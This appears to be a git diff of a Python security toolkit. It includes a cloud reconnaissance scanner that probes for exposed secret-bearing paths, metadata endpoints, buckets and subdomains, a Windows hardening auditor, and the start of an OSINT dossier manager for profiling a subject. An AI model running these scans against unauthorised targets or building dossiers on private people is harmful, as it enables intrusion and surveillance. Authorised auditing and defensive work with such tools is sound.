        for path, name in checks:
            try:
                url = f'{target.rstrip("/")}{path}'
                # No redirects: a 301/302 to a login page is not "exposed".
                resp = requests.get(url, timeout=5, allow_redirects=False)
                if resp.status_code == 200:
                    # Check content for sensitive data keywords (first 2 KB only).
                    sensitive = False
                    body = resp.text[:2000].lower()
                    sensitive_indicators = [
                        'password', 'secret', 'access_key', 'private_key',
                        'database', 'db_host', 'smtp_pass', 'api_key'
                    ]
                    if any(ind in body for ind in sensitive_indicators):
                        sensitive = True
                    services.append({
                        'path': path, 'name': name,
                        'url': url, 'status': resp.status_code,
                        'size': len(resp.content),
                        'sensitive': sensitive,
                        'content_type': resp.headers.get('content-type', '')
                    })
            except Exception:
                pass
        return {
            'ok': True,
            'target': target,
            'services': services,
            'count': len(services)
        }
    # ── Metadata SSRF Check ──────────────────────────────────────────────
    def check_metadata_access(self) -> Dict:
        """Check if cloud metadata service is accessible (SSRF indicator).

        Returns {'ok': True, 'metadata': {provider: {...}}} on success, or
        {'ok': False, ...} when requests is unavailable.
        """
        # Fix: this method previously used requests unconditionally, raising
        # NameError when the optional dependency was missing; every other
        # network method in this class guards on HAS_REQUESTS.
        if not HAS_REQUESTS:
            return {'ok': False, 'error': 'requests not available', 'metadata': {}}
        results = {}
        for provider, url in METADATA_ENDPOINTS.items():
            try:
                headers = {}
                if provider == 'gcp':
                    # GCP's metadata server rejects requests without this header.
                    headers['Metadata-Flavor'] = 'Google'
                resp = requests.get(url, headers=headers, timeout=3)
                results[provider] = {
                    'accessible': resp.status_code == 200,
                    'status': resp.status_code,
                    'content_preview': resp.text[:200] if resp.status_code == 200 else ''
                }
            except Exception:
                results[provider] = {'accessible': False, 'error': 'Connection failed'}
        return {'ok': True, 'metadata': results}
    # ── Subdomain / DNS Enumeration for Cloud ────────────────────────────
    def enum_cloud_subdomains(self, domain: str) -> Dict:
        """Check for cloud-specific subdomains via forward DNS resolution."""
        if not HAS_REQUESTS:
            return {'ok': False, 'error': 'requests not available'}
        cloud_prefixes = [
            'aws', 's3', 'ec2', 'lambda', 'api', 'cdn',
            'azure', 'blob', 'cloud', 'gcp', 'storage',
            'dev', 'staging', 'prod', 'admin', 'internal',
            'vpn', 'mail', 'smtp', 'imap', 'ftp', 'ssh',
            'db', 'database', 'redis', 'elastic', 'kibana',
            'grafana', 'prometheus', 'jenkins', 'gitlab', 'docker',
            'k8s', 'kubernetes', 'consul', 'vault', 'traefik',
        ]
        found = []
        import socket
        for prefix in cloud_prefixes:
            subdomain = f'{prefix}.{domain}'
            try:
                ip = socket.gethostbyname(subdomain)
                found.append({
                    'subdomain': subdomain,
                    'ip': ip,
                    'cloud_hint': self._identify_cloud_ip(ip)
                })
            except socket.gaierror:
                # NXDOMAIN / resolution failure: subdomain does not exist.
                pass
        return {'ok': True, 'domain': domain, 'subdomains': found, 'count': len(found)}
    def _identify_cloud_ip(self, ip: str) -> str:
        """Try to identify cloud provider from IP.

        Rough first-octet heuristic only. NOTE(review): the octet sets
        overlap (e.g. 52 and 104 appear for multiple providers), so AWS
        wins ties by check order — treat the result as a hint, not fact.
        """
        octets = ip.split('.')
        if len(octets) == 4:
            first = int(octets[0])
            if first in (3, 18, 52, 54, 35):
                return 'AWS'
            elif first in (20, 40, 52, 104, 13):
                return 'Azure'
            elif first in (34, 35, 104, 142):
                return 'GCP'
        return 'Unknown'
    # ── Job Management ───────────────────────────────────────────────────
    def get_job(self, job_id: str) -> Optional[Dict]:
        """Return the state dict of a background job, or None if unknown."""
        return self._jobs.get(job_id)
    def list_jobs(self) -> List[Dict]:
        """Return all jobs as flat dicts with their id merged in."""
        return [{'id': k, **v} for k, v in self._jobs.items()]
    # ── Save Results ─────────────────────────────────────────────────────
    def save_results(self, name: str, results: Dict) -> Dict:
        """Save scan results as pretty-printed JSON under the data dir."""
        filepath = os.path.join(self.data_dir, f'{name}.json')
        with open(filepath, 'w') as f:
            json.dump(results, f, indent=2)
        return {'ok': True, 'path': filepath}
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None
def get_cloud_scanner() -> CloudScanner:
    """Return the process-wide CloudScanner singleton, creating it lazily."""
    global _instance
    scanner = _instance
    if scanner is None:
        scanner = CloudScanner()
        _instance = scanner
    return scanner
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
    """CLI entry point for Cloud Security module.

    Interactive menu over CloudScanner. Fix: choices 2 (GCS) and 3 (Azure)
    were listed in the menu but had no handlers, so selecting them silently
    did nothing; they now start and poll their enumeration jobs like option 1.
    """
    if not HAS_REQUESTS:
        print(" Error: requests library required")
        return
    scanner = get_cloud_scanner()
    def _poll_and_print(job_id):
        """Poll a background enumeration job until complete, then print findings."""
        print(f" Scanning... (job: {job_id})")
        while True:
            job = scanner.get_job(job_id)
            if job['status'] == 'complete':
                for b in job['found']:
                    if b.get('listable'):
                        status = 'PUBLIC+LISTABLE'
                    elif b.get('public'):
                        status = 'PUBLIC'
                    else:
                        status = 'EXISTS'
                    # Azure results carry account/container instead of a bucket key.
                    label = b.get('bucket') or f"{b.get('account')}/{b.get('container')}"
                    print(f" [{status}] {label}")
                if not job['found']:
                    print(" No buckets found")
                break
            time.sleep(1)
    while True:
        print(f"\n{'='*60}")
        print(f" Cloud Security Scanner")
        print(f"{'='*60}")
        print()
        print(" 1 — Enumerate S3 Buckets (AWS)")
        print(" 2 — Enumerate GCS Buckets (Google)")
        print(" 3 — Enumerate Azure Blobs")
        print(" 4 — Scan Exposed Services")
        print(" 5 — Check Metadata Access (SSRF)")
        print(" 6 — Cloud Subdomain Enum")
        print(" 0 — Back")
        print()
        choice = input(" > ").strip()
        if choice == '0':
            break
        elif choice == '1':
            kw = input(" Target keyword: ").strip()
            if kw:
                _poll_and_print(scanner.enum_s3_buckets(kw))
        elif choice == '2':
            kw = input(" Target keyword: ").strip()
            if kw:
                _poll_and_print(scanner.enum_gcs_buckets(kw))
        elif choice == '3':
            kw = input(" Target keyword: ").strip()
            if kw:
                _poll_and_print(scanner.enum_azure_blobs(kw))
        elif choice == '4':
            target = input(" Target URL: ").strip()
            if target:
                result = scanner.scan_exposed_services(target)
                for s in result['services']:
                    flag = ' [SENSITIVE]' if s.get('sensitive') else ''
                    print(f" {s['path']}: {s['name']}{flag}")
        elif choice == '5':
            result = scanner.check_metadata_access()
            for provider, info in result['metadata'].items():
                status = 'ACCESSIBLE' if info.get('accessible') else 'blocked'
                print(f" {provider}: {status}")
        elif choice == '6':
            domain = input(" Target domain: ").strip()
            if domain:
                result = scanner.enum_cloud_subdomains(domain)
                for s in result['subdomains']:
                    print(f" {s['subdomain']} -> {s['ip']} ({s['cloud_hint']})")

1482
modules/container_sec.py Normal file

File diff suppressed because it is too large Load Diff

1027
modules/counter.py Normal file

File diff suppressed because it is too large Load Diff

1287
modules/deauth.py Normal file

File diff suppressed because it is too large Load Diff

1061
modules/defender.py Normal file

File diff suppressed because it is too large Load Diff

1162
modules/defender_monitor.py Normal file

File diff suppressed because it is too large Load Diff

372
modules/defender_windows.py Normal file
View File

@@ -0,0 +1,372 @@
"""
AUTARCH Windows Defender Module
Windows-native security posture assessment
Checks Windows system configuration for security best practices.
"""
import os
import sys
import subprocess
import re
import json
from pathlib import Path
from datetime import datetime
sys.path.insert(0, str(Path(__file__).parent.parent))
# Module metadata
DESCRIPTION = "Windows system hardening & security checks"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "defense"
class WindowsDefender:
    """Windows security checker.

    Runs a battery of configuration audits via netsh / PowerShell and records
    pass/fail results in self.results for scoring by the caller.
    """
    def __init__(self):
        # Each entry: {"name": str, "passed": bool, "details": str}.
        self.results = []
    def check(self, name: str, passed: bool, details: str = ""):
        """Record a check result."""
        self.results.append({"name": name, "passed": passed, "details": details})
    def run_cmd(self, cmd: str, timeout=15) -> tuple:
        """Run command and return (success, output).

        success is True only for exit code 0; timeouts and launch failures
        are reported as (False, "").
        """
        try:
            result = subprocess.run(cmd, shell=True, capture_output=True,
                                    text=True, timeout=timeout)
            return result.returncode == 0, result.stdout.strip()
        except Exception:
            return False, ""
    def run_ps(self, ps_command: str, timeout=15) -> tuple:
        """Run a PowerShell command and return (success, output)."""
        # -NoProfile/-ExecutionPolicy Bypass keep runs fast and policy-independent.
        cmd = f'powershell -NoProfile -ExecutionPolicy Bypass -Command "{ps_command}"'
        return self.run_cmd(cmd, timeout=timeout)
    # ==================== SECURITY CHECKS ====================
    def check_firewall(self):
        """Check Windows Firewall status for all profiles."""
        success, output = self.run_cmd("netsh advfirewall show allprofiles state")
        if success:
            # NOTE(review): substring counting of "on"/"off" assumes those words
            # only appear in the per-profile State lines of netsh output;
            # verify against localized Windows builds.
            profiles_on = output.lower().count("on")
            profiles_off = output.lower().count("off")
            if profiles_off > 0:
                self.check("Windows Firewall", False,
                           f"{profiles_off} profile(s) disabled")
            else:
                self.check("Windows Firewall", True,
                           f"All {profiles_on} profiles enabled")
        else:
            self.check("Windows Firewall", False, "Could not query firewall state")
    def check_ssh_config(self):
        """Check Windows OpenSSH configuration."""
        success, output = self.run_ps(
            "Get-WindowsCapability -Online | Where-Object Name -like 'OpenSSH.Server*' "
            "| Select-Object -ExpandProperty State"
        )
        # No OpenSSH server installed means nothing to harden.
        if not success or "Installed" not in output:
            self.check("SSH Config", True, "OpenSSH Server not installed (good)")
            return
        sshd_config = Path(os.environ.get('ProgramData', 'C:\\ProgramData')) / 'ssh' / 'sshd_config'
        if not sshd_config.exists():
            self.check("SSH Config", False, "OpenSSH installed but sshd_config not found")
            return
        content = sshd_config.read_text(errors='ignore')
        # NOTE(review): plain substring match also hits commented-out lines;
        # a '#PermitRootLogin no' comment would pass this check.
        if "PermitRootLogin no" in content or "PermitRootLogin prohibit-password" in content:
            self.check("SSH Root Login Disabled", True)
        else:
            self.check("SSH Root Login Disabled", False, "Root login may be enabled")
        if "PasswordAuthentication no" in content:
            self.check("SSH Password Auth Disabled", True)
        else:
            self.check("SSH Password Auth Disabled", False,
                       "Consider using key-based auth only")
    def check_open_ports(self):
        """Check for high-risk listening ports on Windows."""
        success, output = self.run_ps(
            "Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue "
            "| Select-Object LocalPort, OwningProcess | Format-Table -AutoSize"
        )
        if not success:
            # Fallback for systems without the NetTCPIP PowerShell module.
            success, output = self.run_cmd("netstat -ano | findstr LISTENING")
        if success:
            high_risk = []
            # Both ':<port> ' (netstat) and tab-separated (PS table) forms are probed.
            if ':23 ' in output or '\t23\t' in output:
                high_risk.append("23 (Telnet)")
            if ':21 ' in output or '\t21\t' in output:
                high_risk.append("21 (FTP)")
            if ':3389 ' in output or '\t3389\t' in output:
                high_risk.append("3389 (RDP)")
            if ':445 ' in output or '\t445\t' in output:
                high_risk.append("445 (SMB)")
            if ':135 ' in output or '\t135\t' in output:
                high_risk.append("135 (RPC)")
            lines = [l for l in output.split('\n') if l.strip()]
            if high_risk:
                self.check("High-Risk Ports", False,
                           f"Open: {', '.join(high_risk)}")
            else:
                self.check("High-Risk Ports", True,
                           f"{len(lines)} services listening, no high-risk ports")
        else:
            self.check("High-Risk Ports", True, "Could not enumerate ports")
    def check_updates(self):
        """Check Windows update status."""
        success, output = self.run_ps(
            "Get-HotFix | Sort-Object InstalledOn -Descending "
            "| Select-Object -First 1 -ExpandProperty InstalledOn"
        )
        if success and output.strip():
            self.check("System Updates", True,
                       f"Last update installed: {output.strip()}")
        else:
            # Fallback: at least report how many hotfixes exist.
            success, output = self.run_ps("(Get-HotFix).Count")
            if success and output.strip():
                self.check("System Updates", True,
                           f"{output.strip()} hotfixes installed")
            else:
                self.check("System Updates", False, "Could not query update status")
    def check_users(self):
        """Check Windows user security."""
        # Admin accounts: flag more than two members of Administrators.
        success, output = self.run_ps(
            "Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue "
            "| Select-Object -ExpandProperty Name"
        )
        if success:
            admins = [u.strip() for u in output.split('\n') if u.strip()]
            self.check("Admin Accounts", len(admins) <= 2,
                       f"Admin users: {', '.join(admins)}")
        # Enabled accounts with no password required
        success, output = self.run_ps(
            "Get-LocalUser | Where-Object {$_.Enabled -eq $true -and $_.PasswordRequired -eq $false} "
            "| Select-Object -ExpandProperty Name"
        )
        if success:
            no_pw = [u.strip() for u in output.split('\n') if u.strip()]
            self.check("Password Required", len(no_pw) == 0,
                       f"No password required: {', '.join(no_pw)}" if no_pw else "All accounts require passwords")
        # Guest account should always be disabled.
        success, output = self.run_ps("(Get-LocalUser -Name 'Guest' -ErrorAction SilentlyContinue).Enabled")
        if success:
            guest_enabled = output.strip().lower() == 'true'
            self.check("Guest Account Disabled", not guest_enabled,
                       "Guest account is enabled" if guest_enabled else "Guest account disabled")
    def check_permissions(self):
        """Check critical Windows file/folder permissions."""
        critical_paths = [
            (os.environ.get('SystemRoot', 'C:\\Windows') + '\\System32\\config', "SAM Registry Hive"),
            (os.environ.get('ProgramData', 'C:\\ProgramData') + '\\ssh', "SSH Config Dir"),
        ]
        for filepath, label in critical_paths:
            if os.path.exists(filepath):
                success, output = self.run_cmd(f'icacls "{filepath}"')
                if success:
                    # Everyone:(F) / Everyone:(OI)(CI)(F) = world-writable ACL.
                    has_everyone_full = 'Everyone:(F)' in output or 'Everyone:(OI)(CI)(F)' in output
                    self.check(f"Permissions: {label}", not has_everyone_full,
                               f"Everyone has Full Control on {filepath}" if has_everyone_full else "Restricted")
    def check_services(self):
        """Check for dangerous or unnecessary Windows services."""
        # Service name -> human-readable label for reporting.
        dangerous = {
            "RemoteRegistry": "Remote Registry",
            "TlntSvr": "Telnet Server",
            "SNMP": "SNMP Service",
            "W3SVC": "IIS Web Server",
            "FTPSVC": "FTP Server",
            "SharedAccess": "Internet Connection Sharing",
        }
        running = []
        for svc_name, label in dangerous.items():
            success, output = self.run_ps(
                f"(Get-Service -Name '{svc_name}' -ErrorAction SilentlyContinue).Status"
            )
            if success and 'Running' in output:
                running.append(label)
        self.check("Dangerous Services", len(running) == 0,
                   f"Running: {', '.join(running)}" if running else "No dangerous services running")
    def check_defender(self):
        """Check Windows Defender antivirus status."""
        success, output = self.run_ps(
            "Get-MpComputerStatus -ErrorAction SilentlyContinue "
            "| Select-Object AntivirusEnabled, RealTimeProtectionEnabled, "
            "AntivirusSignatureLastUpdated | Format-List"
        )
        if success:
            av_on = re.search(r'AntivirusEnabled\s*:\s*True', output)
            rt_on = re.search(r'RealTimeProtectionEnabled\s*:\s*True', output)
            if av_on and rt_on:
                sig_match = re.search(r'AntivirusSignatureLastUpdated\s*:\s*(.+)', output)
                sig_date = sig_match.group(1).strip() if sig_match else "Unknown"
                self.check("Windows Defender", True,
                           f"AV enabled, real-time protection on. Signatures: {sig_date}")
            elif av_on:
                self.check("Windows Defender", False,
                           "AV enabled but real-time protection is OFF")
            else:
                self.check("Windows Defender", False, "Windows Defender is disabled")
        else:
            self.check("Windows Defender", False, "Could not query Defender status")
    def check_uac(self):
        """Check UAC (User Account Control) status."""
        # EnableLUA=1 means UAC is on at all.
        success, output = self.run_ps(
            "(Get-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System' "
            "-Name EnableLUA -ErrorAction SilentlyContinue).EnableLUA"
        )
        if success:
            enabled = output.strip() == '1'
            self.check("UAC Enabled", enabled,
                       "UAC is enabled" if enabled else "UAC is DISABLED — critical security risk")
        # ConsentPromptBehaviorAdmin controls how admins are prompted (0-5).
        success, output = self.run_ps(
            "(Get-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System' "
            "-Name ConsentPromptBehaviorAdmin -ErrorAction SilentlyContinue).ConsentPromptBehaviorAdmin"
        )
        if success and output.strip().isdigit():
            level = int(output.strip())
            level_names = {
                0: "Never notify (DANGEROUS)",
                1: "Prompt on secure desktop (no dimming)",
                2: "Prompt on secure desktop",
                3: "Prompt for credentials",
                4: "Prompt for consent",
                5: "Prompt for consent (default)"
            }
            desc = level_names.get(level, f"Unknown level: {level}")
            self.check("UAC Prompt Level", level >= 2, desc)
    # ==================== FIREWALL MANAGEMENT ====================
    def get_firewall_rules(self):
        """Get all Windows Firewall inbound rules as raw netsh output."""
        success, output = self.run_cmd(
            "netsh advfirewall firewall show rule name=all dir=in"
        )
        return success, output
    def block_ip(self, ip):
        """Block an IP via Windows Firewall (requires admin privileges)."""
        # Rule names are prefixed so unblock_ip can find/remove them later.
        rule_name = f"AUTARCH_Block_{ip}"
        success, output = self.run_cmd(
            f'netsh advfirewall firewall add rule name="{rule_name}" '
            f'dir=in action=block remoteip={ip}'
        )
        return success, f"Blocked {ip}" if success else f"Failed to block {ip} (need admin privileges)"
    def unblock_ip(self, ip):
        """Unblock an IP via Windows Firewall (removes the AUTARCH rule)."""
        rule_name = f"AUTARCH_Block_{ip}"
        success, output = self.run_cmd(
            f'netsh advfirewall firewall delete rule name="{rule_name}"'
        )
        return success, f"Unblocked {ip}" if success else f"Failed to unblock {ip}"
    # ==================== EVENT LOG ANALYSIS ====================
    def analyze_event_logs(self):
        """Analyze Windows Security and System event logs.

        Returns (auth_results, system_results): failed-login attempts grouped
        by source IP (Security event 4625), and recent System log
        critical/error/warning entries.
        """
        # Failed logins (Event ID 4625); Properties[19]=source IP, [5]=username.
        success, output = self.run_ps(
            "Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625} "
            "-MaxEvents 500 -ErrorAction SilentlyContinue | "
            "Select-Object TimeCreated, @{N='IP';E={$_.Properties[19].Value}}, "
            "@{N='User';E={$_.Properties[5].Value}} | "
            "Group-Object IP | Sort-Object Count -Descending | "
            "Select-Object Count, Name, @{N='Users';E={($_.Group.User | Select-Object -Unique) -join ','}} | "
            "ConvertTo-Json"
        )
        auth_results = []
        if success and output.strip():
            try:
                data = json.loads(output)
                # ConvertTo-Json emits a bare object (not a list) for one result.
                if isinstance(data, dict):
                    data = [data]
                for entry in data:
                    auth_results.append({
                        'ip': entry.get('Name', 'Unknown'),
                        'count': entry.get('Count', 0),
                        'usernames': (entry.get('Users', '') or '').split(','),
                    })
            except json.JSONDecodeError:
                pass
        # System warnings/errors (Level 1=Critical, 2=Error, 3=Warning).
        success, output = self.run_ps(
            "Get-WinEvent -FilterHashtable @{LogName='System'; Level=1,2,3} "
            "-MaxEvents 50 -ErrorAction SilentlyContinue | "
            "Select-Object TimeCreated, Id, LevelDisplayName, Message | "
            "ConvertTo-Json"
        )
        system_results = []
        if success and output.strip():
            try:
                data = json.loads(output)
                if isinstance(data, dict):
                    data = [data]
                for entry in data[:20]:
                    system_results.append({
                        'type': entry.get('LevelDisplayName', 'Warning'),
                        'id': entry.get('Id', 0),
                        'time': str(entry.get('TimeCreated', '')),
                        'detail': (entry.get('Message', '') or '')[:200],
                        'severity': 'HIGH' if entry.get('LevelDisplayName') in ('Critical', 'Error') else 'MEDIUM',
                    })
            except json.JSONDecodeError:
                pass
        return auth_results, system_results
# ==================== CLI MENU ====================
def run():
    """CLI entry point."""
    from core.banner import Colors, clear_screen, display_banner
    clear_screen()
    display_banner()
    print(f"\n{Colors.BOLD}{Colors.BLUE}Windows System Defense{Colors.RESET}\n")
    auditor = WindowsDefender()
    print(f"{Colors.CYAN}Running Windows security audit...{Colors.RESET}\n")
    # Run every audit in a fixed order; each appends to auditor.results.
    for audit in (
        auditor.check_firewall,
        auditor.check_ssh_config,
        auditor.check_open_ports,
        auditor.check_updates,
        auditor.check_users,
        auditor.check_permissions,
        auditor.check_services,
        auditor.check_defender,
        auditor.check_uac,
    ):
        audit()
    total = len(auditor.results)
    passed = sum(1 for entry in auditor.results if entry['passed'])
    score = int((passed / total) * 100) if total > 0 else 0
    print(f"\n{'=' * 50}")
    if score >= 80:
        color = Colors.GREEN
    elif score >= 50:
        color = Colors.YELLOW
    else:
        color = Colors.RED
    print(f"{color}Security Score: {score}% ({passed}/{total} checks passed){Colors.RESET}")
    print(f"{'=' * 50}\n")
    input("Press Enter to continue...")

803
modules/dossier.py Normal file
View File

@@ -0,0 +1,803 @@
"""
AUTARCH Dossier Module
Manage and correlate OSINT investigation data
Create dossiers to associate related OSINT findings like email searches,
username scans, phone lookups, and custom notes.
"""
import os
import sys
import json
import glob
from pathlib import Path
from datetime import datetime
from typing import Dict, List, Optional
# Module metadata
NAME = "Dossier"
DESCRIPTION = "Manage OSINT investigation dossiers"
AUTHOR = "darkHal Security Group"
VERSION = "1.0"
CATEGORY = "osint"
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors, clear_screen, display_banner
class DossierManager:
"""Manage OSINT investigation dossiers."""
    def __init__(self):
        # NOTE(review): local import — presumably to avoid import-time side
        # effects from core.paths; confirm.
        from core.paths import get_dossiers_dir
        self.dossier_dir = get_dossiers_dir()
        self.dossier_dir.mkdir(exist_ok=True)
        # Currently loaded dossier (dict) and its file path, if any.
        self.current_dossier = None
        self.current_dossier_path = None
def print_status(self, message: str, status: str = "info"):
colors = {"info": Colors.CYAN, "success": Colors.GREEN, "warning": Colors.YELLOW, "error": Colors.RED}
symbols = {"info": "*", "success": "+", "warning": "!", "error": "X"}
print(f"{colors.get(status, Colors.WHITE)}[{symbols.get(status, '*')}] {message}{Colors.RESET}")
# ==================== DOSSIER OPERATIONS ====================
def _generate_dossier_id(self, name: str) -> str:
"""Generate a unique dossier ID from name."""
# Sanitize name for filename
safe_name = "".join(c if c.isalnum() or c in "-_" else "_" for c in name.lower())
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
return f"{safe_name}_{timestamp}"
def _get_dossier_path(self, dossier_id: str) -> Path:
"""Get path to dossier file."""
return self.dossier_dir / f"{dossier_id}.json"
def _create_empty_dossier(self, name: str, subject: str = "", notes: str = "") -> Dict:
"""Create a new empty dossier structure."""
return {
"meta": {
"name": name,
"subject": subject,
"created": datetime.now().isoformat(),
"modified": datetime.now().isoformat(),
"notes": notes,
},
"identifiers": {
"emails": [],
"usernames": [],
"phones": [],
"real_names": [],
"aliases": [],
},
"results": {
"email_searches": [],
"username_searches": [],
"phone_searches": [],
},
"profiles": [],
"custom_notes": [],
}
def save_dossier(self, dossier: Dict, path: Path) -> bool:
"""Save dossier to file."""
try:
dossier["meta"]["modified"] = datetime.now().isoformat()
with open(path, 'w') as f:
json.dump(dossier, f, indent=2)
return True
except Exception as e:
self.print_status(f"Failed to save dossier: {e}", "error")
return False
def load_dossier(self, path: Path) -> Optional[Dict]:
"""Load dossier from file."""
try:
with open(path, 'r') as f:
return json.load(f)
except Exception as e:
self.print_status(f"Failed to load dossier: {e}", "error")
return None
def list_dossiers(self) -> List[Dict]:
"""List all saved dossiers."""
dossiers = []
for file in self.dossier_dir.glob("*.json"):
try:
with open(file, 'r') as f:
data = json.load(f)
dossiers.append({
"path": file,
"id": file.stem,
"name": data.get("meta", {}).get("name", "Unknown"),
"subject": data.get("meta", {}).get("subject", ""),
"created": data.get("meta", {}).get("created", ""),
"modified": data.get("meta", {}).get("modified", ""),
"profiles_count": len(data.get("profiles", [])),
"identifiers_count": sum(len(v) for v in data.get("identifiers", {}).values()),
})
except:
continue
return sorted(dossiers, key=lambda x: x.get("modified", ""), reverse=True)
# ==================== UI METHODS ====================
def create_new_dossier(self):
    """Interactively create, seed, and save a new dossier.

    Prompts for a name (required), subject, free-form notes, and an
    optional first batch of identifiers, then writes the dossier to disk
    and offers to open it immediately.
    """
    print(f"\n{Colors.BOLD}Create New Dossier{Colors.RESET}")
    print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
    name = input(f"{Colors.WHITE}Dossier name: {Colors.RESET}").strip()
    if not name:
        self.print_status("Dossier name is required", "error")
        return
    subject = input(f"{Colors.WHITE}Subject (target name/identifier): {Colors.RESET}").strip()
    notes = input(f"{Colors.WHITE}Initial notes (optional): {Colors.RESET}").strip()
    # Create dossier: id doubles as the JSON filename stem.
    dossier_id = self._generate_dossier_id(name)
    dossier_path = self._get_dossier_path(dossier_id)
    dossier = self._create_empty_dossier(name, subject, notes)
    # Prompt for initial identifiers; a blank answer leaves that list empty.
    print(f"\n{Colors.CYAN}Add initial identifiers (press Enter to skip):{Colors.RESET}")
    emails = input(f"{Colors.WHITE} Email(s) (comma-separated): {Colors.RESET}").strip()
    if emails:
        dossier["identifiers"]["emails"] = [e.strip() for e in emails.split(",") if e.strip()]
    usernames = input(f"{Colors.WHITE} Username(s) (comma-separated): {Colors.RESET}").strip()
    if usernames:
        dossier["identifiers"]["usernames"] = [u.strip() for u in usernames.split(",") if u.strip()]
    phones = input(f"{Colors.WHITE} Phone(s) (comma-separated): {Colors.RESET}").strip()
    if phones:
        dossier["identifiers"]["phones"] = [p.strip() for p in phones.split(",") if p.strip()]
    real_names = input(f"{Colors.WHITE} Real name(s) (comma-separated): {Colors.RESET}").strip()
    if real_names:
        dossier["identifiers"]["real_names"] = [n.strip() for n in real_names.split(",") if n.strip()]
    # Save dossier; on success it also becomes the active dossier.
    if self.save_dossier(dossier, dossier_path):
        self.print_status(f"Dossier created: {dossier_id}", "success")
        self.current_dossier = dossier
        self.current_dossier_path = dossier_path
        # Ask if user wants to open it right away.
        open_now = input(f"\n{Colors.WHITE}Open dossier now? [{Colors.GREEN}y{Colors.WHITE}/{Colors.RED}n{Colors.WHITE}]: {Colors.RESET}").strip().lower()
        if open_now == 'y':
            self.view_dossier_detail(dossier, dossier_path)
def view_dossiers_list(self):
    """List saved dossiers and open the one the user selects.

    "0" or an empty answer returns without opening anything; a
    non-numeric answer is reported as invalid.
    """
    print(f"\n{Colors.BOLD}Saved Dossiers{Colors.RESET}")
    print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
    dossiers = self.list_dossiers()
    if not dossiers:
        self.print_status("No dossiers found. Create one with 'Start New'.", "warning")
        return
    for i, d in enumerate(dossiers, 1):
        # Show only the date part (YYYY-MM-DD) of the ISO timestamp.
        created = d.get("created", "")[:10] if d.get("created") else "Unknown"
        print(f" {Colors.GREEN}[{i}]{Colors.RESET} {d['name']}")
        print(f" {Colors.DIM}Subject: {d.get('subject') or 'N/A'}{Colors.RESET}")
        print(f" {Colors.DIM}Created: {created} | Profiles: {d['profiles_count']} | Identifiers: {d['identifiers_count']}{Colors.RESET}")
        print()
    print(f" {Colors.DIM}[0]{Colors.RESET} Back")
    print()
    choice = input(f"{Colors.WHITE}Select dossier to view: {Colors.RESET}").strip()
    if choice == "0" or not choice:
        return
    try:
        idx = int(choice) - 1
        if 0 <= idx < len(dossiers):
            selected = dossiers[idx]
            # Re-load the full dossier; the list entries are summaries only.
            dossier = self.load_dossier(selected["path"])
            if dossier:
                self.view_dossier_detail(dossier, selected["path"])
    except ValueError:
        self.print_status("Invalid selection", "error")
def view_dossier_detail(self, dossier: Dict, dossier_path: Path):
    """Interactive detail view / management loop for one dossier.

    Shows summary stats plus a menu of view/add/manage actions and
    dispatches to the corresponding helper until the user backs out
    (or deletes the dossier).
    """
    self.current_dossier = dossier
    self.current_dossier_path = dossier_path
    while True:
        clear_screen()
        display_banner()
        meta = dossier.get("meta", {})
        identifiers = dossier.get("identifiers", {})
        results = dossier.get("results", {})
        profiles = dossier.get("profiles", [])
        print(f"{Colors.MAGENTA}{Colors.BOLD} Dossier: {meta.get('name', 'Unknown')}{Colors.RESET}")
        print(f"{Colors.DIM} Subject: {meta.get('subject') or 'N/A'}{Colors.RESET}")
        print(f"{Colors.DIM} Created: {meta.get('created', '')[:19]}{Colors.RESET}")
        print(f"{Colors.DIM} {'' * 50}{Colors.RESET}")
        print()
        # Summary stats across all identifier / search buckets.
        total_identifiers = sum(len(v) for v in identifiers.values())
        total_searches = sum(len(v) for v in results.values())
        print(f" {Colors.CYAN}Summary:{Colors.RESET}")
        print(f" Identifiers: {total_identifiers}")
        print(f" Searches: {total_searches}")
        print(f" Profiles: {len(profiles)}")
        print()
        # Menu
        print(f" {Colors.GREEN}View{Colors.RESET}")
        print(f" {Colors.GREEN}[1]{Colors.RESET} View Identifiers")
        print(f" {Colors.GREEN}[2]{Colors.RESET} View Search Results")
        print(f" {Colors.GREEN}[3]{Colors.RESET} View Profiles")
        print(f" {Colors.GREEN}[4]{Colors.RESET} View Notes")
        print()
        print(f" {Colors.CYAN}Add{Colors.RESET}")
        print(f" {Colors.CYAN}[5]{Colors.RESET} Add Identifier")
        print(f" {Colors.CYAN}[6]{Colors.RESET} Import Search Results")
        print(f" {Colors.CYAN}[7]{Colors.RESET} Add Profile Manually")
        print(f" {Colors.CYAN}[8]{Colors.RESET} Add Note")
        print()
        print(f" {Colors.YELLOW}Manage{Colors.RESET}")
        print(f" {Colors.YELLOW}[E]{Colors.RESET} Edit Dossier Info")
        print(f" {Colors.YELLOW}[X]{Colors.RESET} Export Dossier")
        print(f" {Colors.RED}[D]{Colors.RESET} Delete Dossier")
        print()
        print(f" {Colors.DIM}[0]{Colors.RESET} Back")
        print()
        choice = input(f"{Colors.WHITE} Select: {Colors.RESET}").strip().lower()
        if choice == "0":
            break
        elif choice == "1":
            self._view_identifiers(dossier)
        elif choice == "2":
            self._view_search_results(dossier)
        elif choice == "3":
            self._view_profiles(dossier)
        elif choice == "4":
            self._view_notes(dossier)
        elif choice == "5":
            self._add_identifier(dossier, dossier_path)
        elif choice == "6":
            self._import_search_results(dossier, dossier_path)
        elif choice == "7":
            self._add_profile_manually(dossier, dossier_path)
        elif choice == "8":
            self._add_note(dossier, dossier_path)
        elif choice == "e":
            self._edit_dossier_info(dossier, dossier_path)
        elif choice == "x":
            self._export_dossier(dossier)
        elif choice == "d":
            # Only leave the loop when the file was actually deleted.
            if self._delete_dossier(dossier_path):
                break
def _view_identifiers(self, dossier: Dict):
    """Print every identifier in the dossier, grouped by type."""
    print(f"\n{Colors.BOLD}Identifiers{Colors.RESET}")
